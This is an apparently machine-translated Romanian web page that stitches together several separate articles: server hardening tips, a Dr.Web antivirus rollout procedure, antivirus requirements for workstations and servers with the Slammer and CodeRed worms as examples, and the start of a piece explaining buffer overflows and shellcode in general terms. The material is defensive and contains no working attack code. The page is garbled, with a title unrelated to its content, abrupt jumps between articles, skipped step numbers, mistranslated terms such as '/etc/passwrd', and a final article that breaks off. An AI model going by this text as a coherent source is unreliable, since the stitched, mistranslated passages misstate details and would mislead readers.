Crearea unui server de protecție antivirus. Aceste setări vă permit să definiți grupuri de computere și domenii de scanat. Probleme cu programarea utilizatorilor

Este imposibil să protejezi serverul de accesul extern odată pentru totdeauna, deoarece în fiecare zi se descoperă noi vulnerabilități și apar noi modalități de hacking a serverului. Vom vorbi despre protejarea serverelor împotriva accesului neautorizat în acest articol.

Serverele oricărei companii pot deveni mai devreme sau mai târziu o țintă pentru hacking sau un atac de virus. De obicei, rezultatul unui astfel de atac este pierderea de date, daune reputaționale sau financiare, astfel încât problemele de securitate ale serverului ar trebui abordate în primul rând.

Trebuie înțeles că protecția împotriva hacking-ului de server este un set de măsuri, inclusiv cele care implică monitorizarea constantă a funcționării serverului și lucrează pentru îmbunătățirea protecției. Este imposibil să protejezi serverul de accesul extern odată pentru totdeauna, deoarece în fiecare zi se descoperă noi vulnerabilități și apar noi modalități de hacking a serverului.

Vom vorbi despre protejarea serverelor împotriva accesului neautorizat în acest articol.

Modalități și metode de a proteja serverele împotriva accesului neautorizat

Protecția fizică a serverului

Protecție fizică. Este de dorit ca serverul să fie amplasat într-un centru de date securizat, o cameră închisă și păzită, străinii să nu aibă acces la server.

Configurați autentificarea SSH

Când configurați accesul la server, utilizați autentificarea cheii SSH în loc de o parolă, deoarece astfel de chei sunt mult mai dificile și, uneori, pur și simplu imposibil de spart folosind o căutare cu forță brută.

Dacă credeți că mai aveți nevoie de o parolă, asigurați-vă că limitați numărul de încercări de a o introduce.

Fiți atenți dacă vedeți un mesaj ca acesta când vă conectați:

Ultima conectare eșuată: marți 28 sept 12:42:35 MSK 2017 de la 52.15.194.10 pe ssh:notty
De atunci, au existat 8243 de încercări de conectare nereușite ultimul logare cu succes.

Poate indica faptul că serverul dvs. a fost piratat. În acest caz, pentru a configura securitatea serverului, modificați portul SSH, limitați lista de IP-uri de la care este posibil accesul la server sau instalați software care blochează automat activitatea excesiv de frecventă și suspectă.

Instalați în mod regulat cele mai recente actualizări

Pentru a asigura protecția serverului, instalați la timp cele mai recente patch-uri și actualizări ale software-ului server pe care îl utilizați - sistem de operare, hypervisor, server de baze de date.

Este recomandabil să verificați în fiecare zi noi patch-uri, actualizări și erori/vulnerabilități raportate pentru a preveni atacurile care exploatează vulnerabilități zero-day. Pentru a face acest lucru, abonați-vă la știrile companiei de dezvoltare de software, urmăriți paginile acesteia pe rețelele sociale.

Protejați parolele

De departe, una dintre cele mai comune modalități de a obține acces la un server este de a sparge parola serverului. Prin urmare, urmați recomandările binecunoscute, dar totuși relevante pentru a nu lăsa serverul neprotejat:

• nu utilizați parole ușor de ghicit, cum ar fi numele companiei;
• dacă încă utilizați parola implicită pentru consola de administrare, schimbați-o imediat;
• parolele pentru diferite servicii trebuie să fie diferite;
• dacă trebuie să împărtășiți parola cu cineva, nu trimiteți niciodată adresa IP, numele de utilizator și parola în același e-mail sau mesaj messenger;
• Puteți configura verificarea în doi pași pentru a vă conecta la contul de administrator.

firewall

• Asigurați-vă că serverul are , este configurat și rulează tot timpul.
• Protejați atât traficul de intrare, cât și cel de ieșire.
• Urmăriți ce porturi sunt deschise și în ce scop, nu deschideți nimic inutil pentru a reduce numărul de vulnerabilități posibile pentru hacking server.

În special, firewall-ul este foarte util în protejarea serverului de atacurile ddos, deoarece puteți crea rapid reguli de blocare pentru firewall și puteți adăuga adrese IP de la care provine atacul sau puteți bloca accesul la anumite aplicații folosind anumite protocoale.

Monitorizare și detectare a intruziunilor

• Limitați software-ul și serviciile care rulează pe serverul dvs. Verificați periodic tot ce rulați și, dacă sunt găsite procese necunoscute, ștergeți-le imediat și începeți să căutați viruși.
• Verificați periodic dacă există semne de manipulare. Un hack poate fi evidențiat de noile conturi de utilizator pe care nu le-ați creat, mutat sau ștergeți un fișier /etc/syslog.conf, fișiere șterse /etc/shadowȘi /etc/passwrd .
• Monitorizați-vă serverul, urmăriți viteza și debitul său normal, astfel încât să puteți observa abateri, de exemplu, atunci când sarcina pe server a devenit mult mai mare decât de obicei.

Folosind VPN și criptare SSL/TLS

Dacă este necesar accesul de la distanță la server, acesta trebuie să fie permis numai de la anumite adrese IP și să aibă loc prin VPN.

Următorul pas în asigurarea securității poate fi configurarea SSL, care nu numai că va cripta datele, ci și va verifica identitatea celorlalți participanți la infrastructura de rețea prin emiterea de certificate adecvate pentru aceștia.

Verificarea securității serverului

Ar fi o idee bună să verificați în mod independent securitatea serverului folosind metoda pentest, de exemplu. simulare de atac pentru a găsi potențiale vulnerabilități și a le elimina la timp. Este de dorit să se implice în acest sens specialiști în securitatea informațiilor, totuși, unele teste pot fi făcute independent folosind programe de hacking de server.

Ce altceva amenință serverele în afară de hacking

Un server se poate defecta din mai multe motive, altele decât a fi piratat. De exemplu, ar putea fi o infecție cu malware sau doar o defecțiune fizică a uneia dintre componente.

Prin urmare, măsurile de protecție a serverului ar trebui să includă:

• Instalarea și actualizarea programelor pentru protejarea serverului - antivirusuri.
• Copii regulate criptate ale datelor cel puțin o dată pe săptămână, deoarece, conform statisticilor, hard disk-urile serverelor sunt pe primul loc în ceea ce privește frecvența defecțiunilor. Asigurați-vă că backupul este stocat într-un mediu securizat din punct de vedere fizic.
• Asigurarea alimentării neîntrerupte a camerei serverelor.
• Prevenirea fizică în timp util a serverelor, inclusiv curățarea acestora de praf și înlocuirea pastei termice.

Experiența specialiștilor Integrus ne spune asta cea mai buna protectieîmpotriva unor astfel de amenințări este aplicarea celor mai bune practici în domeniul sistemelor de protecție a serverelor.

Pentru a asigura securitatea serverelor clienților noștri, folosim o combinație de instrumente: firewall-uri, antivirusuri, tehnologii de securitate/gestionare a evenimentelor (SIM/SEM), tehnologii de detectare/protecție a intruziunilor (IDS/IPS), tehnologii de analiză comportamentală a rețelei (NBA). , desigur servere regulate de întreținere preventivă și amenajarea camerelor de servere securizate la cheie. Acest lucru vă permite să minimizați riscurile de hacking sau defecțiune a serverului din alte motive.

Suntem pregătiți să efectuăm un audit de securitate al serverelor companiei dumneavoastră, să consultăm specialiști, să efectuăm toate tipurile de lucrări privind configurarea protecției echipamentelor serverului.

VYACHESLAV MEDVEDEV, Analist principal al Departamentului de Dezvoltare al Doctor Web

Procedura de implementare a protecției antivirus

Destul de des, în momentul selecției (și uneori deja în momentul achiziției), clienții sunt interesați de recomandări cu privire la modul de implementare a protecției antivirus sau cu privire la etapele de înlocuire a unui produs utilizat anterior. Acest articol va discuta despre cum să organizați corect procesul

Extrem punct important. Din păcate, în cele mai multe cazuri, contactele de vânzări merg cu managerii, iar problema testării este transferată administratorilor de sistem. Rezultatul este adesea un raport care surprinde chiar și vânzătorul. Denumiri incorecte de produse, versiuni antice, indicii ale lipsei de funcționalitate care există de fapt de câțiva ani etc. Totul trebuie refăcut, dar trenul a plecat deja, iar onoarea corporativă face dificilă recunoașterea că specialiștilor lor le lipsesc calificările necesare.

1) Studierea posibilităților soluției în timpul instalărilor de testare a sistemelor de protecție pentru stații de lucru, servere de fișiere, servere de mail, precum și servere de management al protecției antivirus. Există, de asemenea, câteva capcane aici. Destul de ciudat, dar destul de des clienții nu știu de ce au nevoie. Și ar fi în regulă dacă întrebarea ar fi despre funcționalitate, ar fi clar. Adesea, chiar și problema listei de software utilizate în organizație provoacă dificultăți, ceea ce, la rândul său, nu permite formarea de propuneri pentru lista de software furnizat.

A doua problemă este legată de faptul că administratorii de sistem (care, de regulă, efectuează teste) cunosc bine produsele folosite, dar (în mod firesc) nu cunosc avantajele și dezavantajele produsului testat (dar în același timp). timp în care se așteaptă că vor exista capcane în cazul achiziționării unui produs) . În consecință, se recomandă să conveniți cu furnizorul propus o listă de proceduri care vor fi implementate folosind produsul achiziționat și să solicitați instrucțiuni pas cu pas pentru această funcționalitate sau, în absența unor astfel de instrucțiuni, instrucțiuni de testare. Acest lucru va evita pierderea timpului în studierea problemelor care nu sunt evidente.

2) Verificarea valabilitatii politicilor de securitate formate in conformitate cu politica de securitate a informatiilor a companiei. Datorită faptului că fiecare produs implementează în felul său funcționalitatea cerută de companie (de exemplu, permite sau nu permite utilizarea unui browser arbitrar pentru management), atât lista pașilor procedurii, cât și durata acesteia pot diferi. În vremuri normale, acest lucru nu este critic, dar în cazul unui incident viral, fiecare secundă poate fi prețioasă.

3) Verificarea compatibilității software-ului Dr.Web și a software-ului utilizat în companie. Incompatibilitatea software nu este obișnuită, dar o astfel de posibilitate nu poate fi ignorată. Prin urmare, acest pas este obligatoriu și în timpul testării produsului propus.

4) Perfecţionarea planului de implementare a software-ului Dr.Web pe baza rezultatelor instalărilor de testare în conformitate cu structura reţelei corporative a companiei şi cu programul de lucru al angajaţilor.

a) Clarificarea timpului de implementare a componentelor software Dr.Web în condițiile rețelei locale a companiei. Destul de des, în timpul procesului de achiziție, se pune întrebarea despre timpul necesar pentru implementare. Practica arată că, în marea majoritate a cazurilor, durata desfășurării depinde numai de specialiștii companiei. Conform aceleiași practici, un weekend este suficient pentru a transfera complet o firmă de la un sistem de protecție la altul cu numărul de stații apropiindu-se de o mie.

b) Selectarea tipului de implementare a software-ului Dr.Web pe stațiile locale și serverele de fișiere (politica AD, rularea distribuțiilor la nivel local, scanarea rețelei pentru stații neprotejate etc.). Depinzând de lățimea de bandă Cerințe de securitate pentru rețea, Active Directory, sucursale și lucrători la distanță, o companie poate alege dintr-o varietate de opțiuni de implementare (vezi Figura 1).

c) Alegerea ordinii și timpului de implementare a software-ului în conformitate cu structura rețelei corporative a companiei și cu programul de lucru al angajaților. Este extrem de important să se asigure continuitatea companiei în timpul implementării sistemului de protecție. Conform legii ticăloșiei, tocmai în momentul lipsei de protecție pot apărea cele mai teribile infecții.

În fig. 2.

5) Instruirea administratorilor de securitate ai companiei cum să lucreze cu software-ul.

6) Dezvoltarea procedurilor legate de eliminarea software-ului antivirus utilizat și instalarea software-ului.

Destul de ciudat, eliminarea antivirusului folosit ridică o mulțime de întrebări. Clienții solicită ca antivirusul instalat să îl elimine pe cel utilizat anterior. Din păcate, în majoritatea cazurilor acest lucru nu este posibil. Sistemul de autoprotecție al antivirusului, conceput pentru a rezista intrușilor, împiedică îndepărtarea acestuia de către oricine.

a) Elaborarea măsurilor de protecție pentru perioada de absență a software-ului antivirus pe elementele rețelei companiei. Alternativ, puteți implementa scanarea întregului trafic de intrare pe gateway pentru o anumită perioadă și puteți interzice utilizarea suporturilor amovibile.

7) Verificarea rețelei locale (stații și servere protejate) pentru disponibilitatea serviciilor necesare pentru implementarea software-ului în rețeaua companiei. Dacă este necesar, ajustați regulile firewall utilizate în rețeaua companiei. Acest punct este, de asemenea, problematic. Destul de ciudat, niciun produs nu poate condensa din aer pe un computer protejat. În funcție de tipul de implementare ales, trebuie să deschideți anumite porturi, să activați serviciile necesare etc.

Uneori, restricțiile privind porturile și serviciile utilizate de companie servesc drept bază pentru alegerea tipului de implementare.

8) Aprobarea programului de desfășurare în rețeaua companiei. Aducerea programului angajatilor companiei in partea care ii priveste. Angajații companiei ar trebui să fie conștienți (în partea care îi privește) despre evenimentele desfășurate în companie. Ca parte a activităților în desfășurare, specialiștii companiei ar trebui să poată obține rapid acces la calculatoarele și spațiile necesare. Adesea, acest lucru nu este posibil fără aprobarea liderului relevant.

Înlocuirea software-ului antivirus în rețeaua companiei

1) Pregătirea software-ului necesar în funcție de tipul de implementare selectat. Este destul de evident că pentru diferite sisteme de operare, tipuri de aplicații etc. sunt utilizate diferite distribuții.

• Instalarea serverelor de rețea ierarhice, a nodurilor de cluster și, dacă este necesar, a bazei de date necesare (vezi Figura 3).

• Implementarea sistemului de redundanță a serverului Dr.Web (vezi Fig. 4). Orice server se poate bloca. Dar căderea serverului antivirus duce la întreruperea actualizărilor stațiilor protejate. Prin urmare, redundanța serverelor antivirus este esențială.

• Crearea de grupuri și politici.
• Dacă este necesar, numirea administratorilor individuali ai unui grup de utilizatori și restrângerea drepturilor acestor administratori în conformitate cu politica în vigoare în companie.
• Efectuarea activităților necesare în funcție de politica de implementare selectată. De exemplu, configurarea AD.

2) Scanarea rețelei companiei cu Dr.Web CureNet! pentru malware necunoscut anterior (Vezi fig. 5). Din păcate, nu există nicio garanție că PC-ul pe care ar trebui să fie instalată instalarea nu conține malware. Desigur, instalarea pe o mașină infectată este posibilă, dar există întotdeauna șansa ca un malware care rulează să aibă funcționalitate menită să împiedice instalarea unui antivirus. Cel puțin, acest lucru va arunca procesul de implementare a protecției în afara programului, așa că cel mai bine este să verificați dacă există programe malware cu puțin timp înainte de instalare.

• Instalarea sistemului de protectie pentru statiile de lucru si serverele de fisiere in conformitate cu setarile facute in etapa precedenta.
• Instalarea unui sistem de protectie pentru servere de mail, gateway-uri Internet.

5) Funcționarea software-ului în perioada de testare.

6) Efectuarea actualizărilor software în conformitate cu politica în vigoare în companie.

7) Verificări periodice ale stațiilor de lucru protejate, serverelor de fișiere și e-mail (Vezi fig. 7).

8) Controlul acțiunilor software asupra impactului de testare al software-ului rău intenționat.

9) Verificarea procedurii de interacțiune cu suportul tehnic.

În general, nimic complicat dacă te pregătești pentru orice etapă din timp.

Mult succes cu implementarea ta!

In contact cu

Pe baza raționamentului și a exemplelor de mai sus, putem formula cerințele de bază pentru antivirusuri pentru stațiile de lucru. Este clar că aceste cerințe vor fi diferite pentru stațiile de lucru din clase diferite.

Cerințe antivirus pentru stațiile de lucru Windows

Ca și înainte, cerințele vor fi împărțite în mai multe categorii:

1. Cerințe generale- fiabilitate, performanta, usurinta in utilizare, cost redus - nu are rost sa repetam inca o data
2. Cerințe primare- ca urmare a sarcinii principale:
   • Verificarea tuturor fișierelor de pe unitățile locale care sunt accesate - pentru citire, scriere, lansare - pentru a detecta și neutraliza virușii informatici
   • Verificarea unităților detașabile și de rețea
   • Verificare memorie
   • Verificarea mesajelor de intrare și de ieșire pentru viruși, atât mesajele în sine, cât și atașamentele lor trebuie verificate
   • Verificarea scripturilor și a altor elemente active ale paginilor web
   • Verificarea macrocomenzilor din documentele Microsoft Office și din alte fișiere de aplicație
   • Verificarea fișierelor compuse - arhive, arhive autoextractibile, fișiere executabile ambalate, baze de date de e-mail, fișiere în format e-mail, containere OLE
   • Posibilitatea de a selecta diferite acțiuni pentru a fi efectuate asupra fișierelor infectate, implicit:
     • blocare (la verificarea in timp real)
     • înregistrare (la verificare la cerere)
     • îndepărtare
     • trece la carantină
     • tratament
     • cererea de acțiune a utilizatorului
   • Tratarea fișierelor infectate
   • Tratarea fișierelor infectate din arhive
   • De dorit - detectarea programelor potențial nedorite (adware și spyware, instrumente de hacking etc.)
3. Cerințe de management
   • Prezența unei interfețe grafice locale
   • Posibilitate de gestionare la distanță și centralizată (versiunea corporativă)
   • Abilitatea de a programa scanarea și actualizarea sarcinilor pentru a rula
   • Abilitatea de a executa orice sarcini sau de a efectua orice acțiune la cerere (manual)
   • Capacitatea de a restricționa acțiunile unui utilizator neprivilegiat în raport cu complexul antivirus
4. Cerințe de actualizare
   • Suport pentru diverse surse de actualizare, nominal:
     • Resursa HTTP sau FTP
     • Dosar local sau de rețea
     • Sistem de actualizare centralizat (în versiunile corporative)
   • Abilitatea de a actualiza baze de date antivirus, motor antivirus și module de aplicație
   • Capacitatea de a efectua actualizări manual la cerere sau automat la un program
   • Posibilitatea de a anula actualizările bazei de date antivirus
5. Cerințe pentru diagnosticare
   • Notificarea utilizatorului local despre evenimente importante - detectarea virușilor, schimbarea stării antivirusului etc.
   • Păstrarea jurnalelor antivirusului și/sau sarcinilor individuale
   • Notificarea administratorului de securitate antivirus (în versiunea corporativă)

Cerințe antivirus pentru stațiile de lucru Linux/Unix

1. Cerințe generale- practic neschimbat: fiabilitate, performanta, cost redus. Utilizabilitatea în sistemele Unix este în mod tradițional evaluată după criterii ușor diferite față de sistemele Windows, deși această stare de lucruri se schimbă treptat către unificarea cerințelor.
2. Cerințe primare- dupa destinatie:
   • Scanarea la cerere a fișierelor și directoarelor arbitrare pentru viruși
   • Este de dorit, dar nu critic - verificarea anumitor directoare în timp real la accesarea fișierelor. Dacă o astfel de funcționalitate este într-adevăr necesară, atunci aceasta nu este atât o stație de lucru, cât un server - nu există nicio diferență clară între cele două în sistemele Unix.
   • Detectarea virușilor în obiecte compozite - arhive, arhive autoextractibile, module executabile ambalate, baze de date post, fișiere în format mail, containere OLE - nu se limitează la formatele comune în mediul Unix
   • Posibilitatea de a selecta acțiunea care trebuie întreprinsă atunci când sunt detectate fișiere infectate, implicit:
     • șterge
     • mutați sau redenumiți
     • trata
     • scrieți informații într-un raport
     • solicitați utilizatorului o acțiune (când verifică la cerere)
   • Tratarea fișierelor infectate
   • De dorit - posibilitatea de tratament în arhive
3. Cerințe de management
   • Management local prin editarea fișierelor de configurare
   • De preferință - control de la distanță prin interfață web
   • Abilitatea de a programa sarcini pentru a rula și a efectua acțiuni
   • Abilitatea de a efectua sarcini și acțiuni manual
4. Cerințe pentru diagnosticare
   • Păstrarea jurnalelor de lucru
   • Notificarea administratorului de securitate antivirus

Protecția serverului

În general protectie antivirus serverele nu este la fel de diferită de protejarea stațiilor de lucru precum, de exemplu, de protejarea gateway-urilor. Principalele amenințări și tehnologii pentru a le contracara rămân aceleași - doar accentul se schimbă.

Serverele de rețea, precum stațiile de lucru, sunt împărțite în mod natural în clase, în funcție de sistemele de operare utilizate:

• servere Windows
• Servere Novell Netware
• Servere Unix

Principiul diviziunii se datorează amenințărilor de virus caracteristice diferitelor sisteme de operare și, ca urmare, diferitelor opțiuni în determinarea sarcinii principale a antivirusului.

În cazul produselor de protecție a serverelor, nu există o divizare în produse personale și de rețea - toate produsele sunt de rețea (corporate). Mulți producători nu împart deloc produsele corporative în stații de lucru și produse server de fișiere - au un singur produs.

Amenințări și contramăsuri specifice

Toate amenințările specifice serverului sunt asociate nu atât cu caracteristicile sistemelor de operare pentru server, cât cu utilizarea de software vulnerabil specific serverelor.

Servere Microsoft Windows

Pentru serverele Windows, toate aceleași amenințări sunt relevante ca și pentru stațiile de lucru sub Windows NT/2000/XP. Diferențele sunt doar în modul predominant de operare a serverelor, care se exprimă într-o serie de atacuri suplimentare care nu sunt tipice pentru stațiile de lucru.

Deci, utilizatorii lucrează rareori direct în spatele serverelor Windows, ceea ce înseamnă că clienții de e-mail și aplicațiile de birou de pe servere, de regulă, nu sunt utilizați. Drept urmare, cerințele pentru protecția e-mailului la nivel de client de e-mail și instrumentele suplimentare de detectare a virușilor macro în cazul serverelor Windows sunt mai puțin solicitate.

Exemplu. Kaspersky Anti-Virus pentru serverele de fișiere Windows, spre deosebire de Kaspersky Anti-Virus pentru stațiile de lucru Windows, nu are un modul pentru analiza comportamentală a macrocomenzilor executate atunci când se lucrează cu documente Microsoft Office și un modul pentru verificarea corespondenței primite și trimise. Acest lucru nu înseamnă că produsul nu are protecție împotriva virușilor macro și a viermilor de e-mail - după cum sa menționat deja, în cele din urmă, toate fișierele deschise sunt verificate de modulul de protecție în timp real al sistemului de fișiere - doar că specificul funcționării serverului nu necesită instrumente suplimentare de protecție, așa cum era cazul posturilor de lucru.

Pe de altă parte, servicii precum Microsoft SQL Server și Microsoft IIS pot fi utilizate mult mai frecvent pe serverele Windows decât pe stațiile de lucru. La fel ca sistemele de operare produse de Microsoft (și nu numai Microsoft), aceste servicii pot conține vulnerabilități, care au fost exploatate în mod repetat de către autorii de viruși.

Exemplu. În 2003, viermele NetWorm.Win32.Slammer a apărut și a măturat literalmente pe Internet, folosind o vulnerabilitate din Microsoft SQL Server 2000. Slammer nu și-a salvat fișierele pe disc, ci a rulat direct în spațiul de adrese al aplicației SQL Server. După aceea, într-o buclă nesfârșită, viermele a efectuat un atac asupra adreselor IP aleatorii din rețea, încercând să folosească aceeași vulnerabilitate pentru a pătrunde. Ca urmare a activității viermelui, serverele și canalele de comunicare pe Internet au fost supraîncărcate într-o asemenea măsură încât segmente întregi de rețea au fost indisponibile. Coreea de Sud a fost puternic afectată de epidemie. Este de remarcat faptul că viermele nu a efectuat alte acțiuni, cu excepția reproducerii.

Exemplu. Chiar mai devreme, în 2001, o vulnerabilitate din Microsoft IIS 5.0 a fost exploatată de viermele NetWorm.Win32. CodeRed.a. Consecințele epidemiei nu au fost la fel de impresionante ca în cazul viermelui Slammer, dar, pe de altă parte, folosind computere infectate cu CodeRed .a, s-a încercat deloc fără succes un atac DDoS pe site-ul Casei Albe din SUA (www. .whitehouse.gov). De asemenea, CodeRed .a nu a salvat fișiere pe serverele afectate.

Particularitatea ambilor viermi este că modulul de verificare a sistemului de fișiere (fie la cerere, fie la acces) este neputincios împotriva lor. Acești viermi nu salvează copii ale lor pe disc și, în general, nu își arată prezența în sistem în niciun fel, cu excepția activității crescute a rețelei. Până în prezent, principala recomandare pentru protecție este instalarea la timp a patch-urilor pentru sistemul de operare și software-ul utilizat. O altă abordare este configurarea firewall-urilor astfel încât porturile folosite de serviciile vulnerabile să fie inaccesibile din exterior - o cerință rezonabilă în cazul protecției împotriva Slammer, dar inacceptabilă pentru protecția împotriva CodeRed.

Viermii care atacă deja direct serviciile vulnerabile ale sistemului de operare, cum ar fi Lovesan, Sasser, Mytob etc., rămân, de asemenea, relevanți pentru serverele Windows. Protecția împotriva acestora ar trebui asigurată prin măsuri cuprinzătoare - utilizarea paravanelor de protecție, instalarea de corecții, aplicarea verificării la acces ( viermii menționați, dacă sunt atacați cu succes, își salvează fișierele pe hard disk).

Având în vedere natura atacurilor, putem concluziona că principalele mijloace de protejare a serverelor Windows sunt: ​​modulul de scanare a fișierelor la acces, modulul de scanare a fișierelor la cerere, modulul de verificare a scripturilor, iar principalele tehnologii sunt semnătura și analiza euristică. (precum și analiza comportamentală în modulul de verificare a scripturilor) .

Servere Novell Netware

Nu există viruși specifici capabili să infecteze Novell Netware. Adevărat, există mai mulți troieni care fură drepturi de acces la serverele Novell, dar sunt încă proiectați să ruleze în mediul de operare Windows.

În consecință, antivirusul pentru serverul Novell Netware nu este de fapt conceput pentru a proteja acest server. Atunci care este funcția lui? Pentru a preveni răspândirea virușilor. Serverele Novell Netware sunt utilizate în principal ca servere de fișiere; utilizatorii computerelor Windows își pot stoca fișierele pe astfel de servere sau pot rula programe situate pe volumele Novell Netware. Pentru a împiedica virușii să pătrundă în resursele partajate ale serverului Novell sau să ruleze / să citească viruși din astfel de resurse, este necesar un antivirus.

În consecință, principalele instrumente utilizate în antivirus pentru Novell Netware sunt scanările la acces și la cerere.

Dintre tehnologiile specifice utilizate în antivirusuri pentru Novell Netware, este necesar să se remarce blocarea stațiilor și/sau utilizatorilor care scriu programe rău intenționate pe server.

Servere Unix

Același lucru se poate spune despre serverele Unix ca și despre serverele Novell Netware. Antivirusul pentru serverele Unix rezolvă nu atât sarcina de a proteja serverele în sine împotriva infecțiilor, cât mai degrabă sarcina de a preveni răspândirea virușilor prin server. Pentru aceasta, se folosesc aceleași două instrumente principale:

• Verificarea fișierelor la cerere
• Verificarea fișierelor la acces

Exemplu. Kaspersky Anti-Virus pentru serverele de fișiere Unix/Linux include un modul de scanare la acces, în timp ce Kaspersky Anti-Virus pentru stațiile de lucru Linux nu. Acest lucru se datorează diferitelor funcții ale stațiilor de lucru și serverelor Linux - într-o rețea construită exclusiv (sau în mare parte) pe stații Linux, practic nu există niciun risc de infectare cu virus și, prin urmare, nu este nevoie urgentă de un modul care să controleze toate operațiunile cu fișiere. . Dimpotrivă, dacă un computer Linux este utilizat în mod activ pentru stocarea și transferul fișierelor (în special într-o rețea Windows), atunci este, de fapt, un server și necesită monitorizare constantă a fișierelor.

Mulți viermi Linux cunoscuți folosesc pentru a răspândi vulnerabilități nu în sistemul de operare în sine, ci în sistemul și software-ul de aplicație - în serverul ftp wu-ftpd, în serverul web Apache. Este clar că astfel de aplicații sunt folosite mai des pe servere decât pe stațiile de lucru, ceea ce reprezintă un argument suplimentar în favoarea măsurilor îmbunătățite de protecție a serverelor.

Spre deosebire de serverele Novell, unde suportul pentru rețelele Microsoft este o caracteristică încorporată, serverele Unix nu sunt configurate implicit pentru transferurile de fișiere SMB/CIFS. În acest scop, se folosește un pachet software special - Samba, care vă permite să creați resurse partajate compatibile cu rețelele Microsoft.

Dacă fișierele sunt schimbate doar prin protocoale SMB/CIFS, atunci evident că nu are sens să controlezi toate operațiunile cu fișiere, este suficient să verifici doar fișierele transferate folosind serverul Samba.

Exemplu. Gama de produse Kaspersky Lab include o soluție specială - Kaspersky Anti-Virus for Samba Server, concepută special pentru a proteja folderele partajate create pe serverele Unix folosind software-ul Samba. Acest produs nu include un modul care controlează operațiunile cu fișierele, ci folosește un filtru care este încorporat în Samba și interceptează toate fișierele transferate.

În acest articol, aș dori să adun câteva tipuri de atacuri asupra serverelor și mijloace de protejare a serverului de hackeri. S-au scris o mulțime de cărți și articole pe tema securității. Accentul acestui articol este pus pe erorile de bază ale administratorilor și soluțiile pentru a le elimina. După ce a citit acest articol și și-a verificat propriul server, nici administratorul nu va mai putea dormi liniștit, poate doar să spună că am trecut de „minimul de candidat”.

Amintiți-vă administratorilor trei proverbe,
Nu! mai bine tipăriți-le și agățați-le la locul de muncă în fața ochilor:
"Securitatea este un proces",
"Când administratorul nu are ce face, el este angajat în securitate",
"Securitatea este definită de cea mai slabă verigă"
Articolul se adresează administratorilor *nix + Apache + PHP + Perl + (MySQL | PostgreSQL) și protejează serverele de atacuri de la distanță, pentru alți administratori, sper că articolul va fi de gândit.
Diferite cărți au clasificări diferite ale atacurilor hackerilor, voi introduce propria mea diviziune în două clase condiționate de TOATE atacurile, le voi desgrupa:

• Atacul asupra serviciilor care sunt vulnerabile și accesibile prin internet

Pentru a înțelege divizia mea, imaginați-vă că există un script fictiv care atacă de la distanță Apache pe portul 80 și, ca urmare a atacului, Apache se oprește și rămâi fără site-ul tău, deoarece nu există nimeni care să dea pagini web. Serverul dvs. de e-mail sendmail a fost trimis 1000 de caractere în loc de un nume de utilizator scurt ca parametru către VRFY, sendmail nu se aștepta să se întâmple acest lucru și s-a închis, lăsându-vă fără e-mail. Sensul general al atacurilor din această clasă condiționată este că o anumită vulnerabilitate a aplicației este exploatată. Și există trei moduri -

• calea 1) aplicația se va bloca și serviciul nu va fi disponibil, situație DoS;
• calea 2) aplicația va începe să capteze resurse și, după ce le epuizează, va face un DoS;
• calea3) aplicația va fi alimentată cu un shellcode și va fi executat codul atacatorului;

Toate acestea sunt atacuri asupra serviciului (articolul 1) și sunt tratate într-un singur mod: administratorul află prompt de la dezvoltator despre prezența unei vulnerabilități și actualizează acest program.

Atacul la punctul 2 este atunci când un serviciu dinamic implementat într-un limbaj de programare permite recepția parametrilor și îi execută fără a-i verifica. De exemplu, folosind un browser, un atacator, crawling printr-un site Apache, caută vulnerabilități în site-ul însuși și exploatându-le, obține ceea ce își dorește. Scris în Tcl, botul pentru moderarea canalului serverului IRC primește solicitări de la utilizator (numărul unei noi glume, data zilei pentru afișarea vremii) și hacker, recreând munca codului programului bot (inginerie inversă). ), construiește cereri care nu au fost luate în considerare de autorul botului.

Întrebați cum este? atunci cu siguranță aveți nevoie de acest articol. Într-un fel sau altul, chiar dedesubt totul va fi pictat.

Atacul asupra serviciilor vulnerabile și a serverului în sine

În această secțiune, am inclus toate atacurile al căror impact cade asupra sistemului și serviciilor. Adesea, astfel de atacuri sunt posibile din erorile de implementare a programului, cum ar fi depășirile de buffer (buffer overflow). Pe scurt, arată așa, să presupunem că într-un server ftp scris prost există o matrice (buffer) pentru un nume de utilizator pentru un anumit număr de caractere (de exemplu, 10), iar un astfel de server ftp primește 100 de caractere de la un bolnav -wisher, dacă o astfel de situație nu este în codul serverului ftp verificat, are loc o depășire a tamponului.

Deci, ce este util un buffer overflow local pentru hackeri? Este posibil să suprascrieți adresa de retur cu cod rău intenționat. De la distanță, acest lucru vă permite să executați cod arbitrar pe sistemul țintă, la nivel local, dacă programul rulează ca rădăcină, acest lucru vă va permite să obțineți privilegii de administrator de sistem.Codul care provoacă o depășire a bufferului și efectuează acțiuni pentru un hacker se numește shell cod.Scrierea shellcode nu este o sarcină ușoară și necesită cunoștințe de limbaj de asamblare de la hacker, ceea ce implică profesionalism în acest domeniu.

Protecție împotriva atacurilor asupra serviciilor vulnerabile și asupra serverului însuși

• Actualizați. Este necesar să înveți cum să actualizezi întregul sistem și, prin urmare, să poți
  „build the world and the kernel” pentru *nix, actualizați prin sistemul de pachete Linux și puteți face clic pe butonul Actualizare din Windows Update pentru MS Windows licențiat. Administratorii FreeBSD trebuie să poată instala software folosind porturi. În acest fel, veți naviga cu dezvoltatorii, nu împotriva lor.

  Administratorii MS Windows trebuie să se obișnuiască și să utilizeze mai des formatul de distribuție MSI, care este foarte recomandat de Microsoft și acceptă actualizarea pachetului vechi cu cel nou. Orice ai face pe serverul tău, întreabă-te dacă există o nouă versiune a acestui program, cât de ușor este să o actualizezi? Trebuie să creați o soluție asupra căreia aveți control total, da, există proiecte cu propriile dezvoltări sau patch-uri, dar dacă dezvoltările dvs. necesită înghețarea aplicațiilor de care aveți nevoie pe o anumită versiune și nu vă puteți aplica patch-urile noului sistem, o astfel de solutie NU merita!

  Voi face aici o digresiune lirică și voi spune cum a trebuit să mă rup. După ce ai citit articole de pe Internet care de obicei încep așa, „descărcați sursa și puneți-o pentru a face instalarea”. Deci, ce urmează? Cum veți instala noua versiune? Păstrați versiunea veche, astfel încât să puteți face (de|dez)instalați în ea? Și în noua instalare make din nou? Aceste întrebări au fost puse de prietenul meu Dmitri Dubrovin când am început să învățăm FreeBSD. Am început să înțeleg că avea dreptate și, cel puțin pentru Free, această cale nu este potrivită și, nemergând pe calea dezvoltatorilor FreeBSD, mi-am îngreunat doar lucrurile.

